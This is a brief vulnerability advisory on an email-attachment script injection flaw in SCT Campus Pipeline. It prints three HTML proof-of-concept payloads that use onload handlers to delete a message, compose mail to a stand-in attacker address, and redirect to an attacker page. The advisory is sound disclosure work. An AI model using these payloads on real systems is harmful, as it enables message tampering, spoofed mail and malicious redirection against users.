SCT Campus Pipeline Email Attachment Script Injection Vulnerability

SCT Campus Pipeline Email Attachment Script Injection Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

To delete the current email message:
<html><body onload=?deleteMessage()?></body><html>

This exploit will open a new email message with attacker-supplied text:
<html><body
onload="location.replace('http://www.example.com/cp/email/composeBody?function=new&to=attacker@example.com&subject=I
love you matt&body=I was owned by matt')"></body></html>

Site redirection:
<html><body onload="location.replace('http://www.example.com/attackerSpecified.html')">
</body></html>